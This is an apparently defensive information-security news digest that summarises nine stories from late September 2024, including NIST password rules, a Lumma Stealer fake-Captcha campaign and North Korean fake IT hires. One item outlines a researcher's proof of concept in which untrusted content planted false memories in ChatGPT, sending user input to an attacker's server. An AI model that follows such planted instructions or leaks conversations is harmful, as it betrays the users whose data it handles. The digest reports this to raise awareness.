Information Security News 9-30-2024

NIST Drops Password Complexity, Mandatory Reset Rules

Article Link: https://www.darkreading.com/identity-access-management-security/nist-drops-password-complexity-mandatory-reset-rules

• The National Institute of Standards and Technology (NIST) has released a new draft of its password guidelines (NIST SP 800-63-4), simplifying password management by eliminating the requirements for complex passwords and mandatory periodic changes.
• The updated guidelines require credential service providers (CSPs) to accept passwords with a minimum length of eight characters (preferably 15) and a maximum of 64 characters while supporting both ASCII and Unicode characters for greater user flexibility.
• NIST’s shift from promoting complex passwords to emphasizing longer, random passwords suggests their aim is to improve security as users are more likely to create unique passwords that resist brute-force attacks when length is prioritized.
• By advising the CSPs only to enforce password resets in cases of credential breaches, NIST acknowledges that frequent changes can weaken security, encouraging companies to adopt these guidelines and educate users on crafting long, memorable passwords.
• Link to NIST SP 800-63-4: https://pages.nist.gov/800-63-4/

Hacker Plants False Memories in ChatGPT to Steal User Data in Perpetuity

Article Link: https://arstechnica.com/security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/

• ChatGPT’s memory vulnerability allows attackers to plant false information and steal data indefinitely, according to security researcher Johann Rehberger through malicious prompts that manipulated memory and leaked sensitive information.
• Initially OpenAI stated that the flaw was a safety issue but not a security concern. As a result, Rehberger created a proof-of-concept (PoC) and showed how untrusted content could implant false memories, sending user input to an attacker’s server. OpenAI responded to the issue by releasing a partial fix, although concerns remain.
• Users should monitor stored memories and avoid untrusted content, while remediation includes reviewing memory logs, using OpenAI’s memory tools, and staying cautious of potential prompt injection triggers, as these still pose a threat to data security.

Zero Failure Tolerance, A Cybersecurity Myth Holding Back Organizations

Article Link: https://www.infosecurity-magazine.com/news/zero-failure-tolerance/

• The “zero-failure tolerance” mindset in information security is a myth; leaders must prioritize response and recovery over unrealistic prevention efforts.
• Unrealistic expectations leave organizations neglecting recover and mental health support, burning out security teams and weakening defenses.
• Rapid innovations like GenAI demand adaptive strategies; failure to invest in recovery will incapacitate organizations. A strong contingency plan for their-party risks is non-negotiable for sustaining security.
• Success requires abandoning the illusion of perfections, streamlining tools, and building a resilient and mentally strong information security workforce ready to rebound from attacks.

Beware Of Fake Captcha Attacks That Delivers Lumma Stealer Malware

Article Link: https://gbhackers.com/fake-captcha-lumma-stealer-malware/

• In the past month, over 1.4 million users have encountered a surge in fake Captcha campaigns distributing Lumma Stealer malware, designed to steal sensitive data. Cybercriminals employ phishing tactics, such as impersonating the GitHub Security Team, to lure victims to malicious sites for deceptive Captcha screens.
• Engaging with these fake Captchas causes user to unintentionally copy a malicious script that installs Lumma Stealer via commands connecting to a command-and-control (C2) server, disguising itself as a legitimate application, SysSetup[.]exe, and exposing user data to exploitation.
• The reported attacks in Italy, Argentina, France, Spain, and Brazil reinforce the need for users to pay close attention to unsolicited emails, avoid executing unknown scripts, enable multi-factor authentication (MFA), and use reputable antivirus software.

Security Firm’s North Korean Hacker Hire Not an Isolated Incident

Article Link: https://www.darkreading.com/vulnerabilities-threats/security-hire-north-korean-hacker-not-isolated-incident

• KnowBe4, a security awareness firm, unknowingly hired a North Korean hacker posing as a software engineer and who immediately deployed malware, exposing a state-sponsored network of fake IT workers infiltrating U.S. companies for financial gain.
• The breach, caught before major damage, exposed the vulnerability of global hiring practices, particularly in remote work environments, where anywhere from Fortune 500 to small businesses, have unknowingly hired North Korean operatives.
• Organizations must revamp their hiring processes with stricter verification, enhanced behavior monitoring, and greater attention to unusual requests. KnowBe4 suggests “threat modeling” for proactive risk identification.
• Immediate remediation includes restricting access, monitoring suspicious activity, and removing employees if they are confirmed to be threat actors.

LinkedIn Is Quietly Training AI on Your Data—Here’s How to Stop It

Article Link: https://www.pcmag.com/news/linkedin-is-quietly-training-ai-on-your-data-heres-how-to-stop-it

• LinkedIn has been quietly using your data to train AI models, including posts and profile information, without explicit consent. This practice continues in the U.S., but has stopped in the European Union and Switzerland.
• UK regulators, through the International Commissioner’s Office (ICO), halted LinkedIn’s AI data scraping due to privacy concerns, highlighting the importance of protecting user rights. U.S. users remain affected by the default data scraping.
• LinkedIn has updated its policies to disclose AI data usage, but EU and Swiss users are automatically opted out, leaving U.S. users with fewer protections.
• Users concerned about privacy can take steps to manually adjust their settings and prevent their data from being used to train AI models.

Cybersecurity Incident Affects Arkansas City, KS Water Treatment Facility

Article Link: https://www.infosecurity-magazine.com/news/incident-arkansas-city-water/

• On September 22, 2024, the city of Arkansas City, Kansas, reported a cybersecurity incident at its water treatment facility, prompting an immediate switch to manual operations as cybersecurity experts work to restore automated systems while local authorities ensure comprehensive oversight.
• City Manager, Randy Frazer, assured residents that the water supply remains safe and uninterrupted, reaffirming that the city maintains full control of the system during the ongoing response efforts and demonstrating a commitment to public safety.
• Although specific details are still undisclosed, initial indications pint to a potential ransomware attack, as the shift to manual operations typically follows attempts to contain such breaches, leading to the implementation of enhanced security protocols.
• This incident exposes vulnerabilities in public utilities, demanding regular security assessments, employee training, data encryption, physical controls, multi-factor authentication (MFA), and clear incident response plans.
• Link to Arkansas City’s Announcement: https://www.arkcity.org/environmental-services/page/city-arkansas-city-faces-cybersecurity-incident

California’s Gavin Newsom Vetoes Controversial AI Safety Bill

Article Link: https://www.wsj.com/tech/ai/californias-gavin-newsom-vetoes-controversial-ai-safety-bill-d526f621?st=LEigVX&reflink=desktopwebshare_permalink

• Governor Gavin Newsom vetoed an AI safety bill, SB 1047, citing its narrow focus on large AI models while smaller systems handling critical tasks were overlooked. Tech giants like OpenAI opposed the bill.
• The bill aimed to prevent significant AI-related harm, but tech companies warned it could stifle innovation and create legal confusion.
• Newsom is collaborating with AI experts to develop broader legislation while signing other AI-related bills on deepfakes, content labeling, and digital rights.

Ever Wonder How Crooks Get the Credentials to Unlock Stolen Phones?

Article Link: https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/

• Law enforcement agencies recently shut down iServer, a phishing-as-a-service platform that enabled the unlocking of over 1.2 million stolen mobile phones, exposing a significant vulnerability in mobile security and demonstrating the scale of organized cybercrime.
• Since its launch in 2018, iServer allowed low-skilled criminals to easily phish credentials from unsuspecting phone owners via text, email, and voice calls, circumventing security measures like Apple’s “Lost Mode,” which protects devices from unauthorized access.
• Authorities arrested the Argentine national behind iServer and more than 2,000 “unlockers” who used the platform to gather sensitive information, such as device passcodes and user credentials, to assist fellow criminals in accessing locked phones.
• With the iServer domain seizure, security assessors stress the importance of recognizing phishing and social engineering tactics and practicing stronger cyber-hygiene to protect personal data and devices.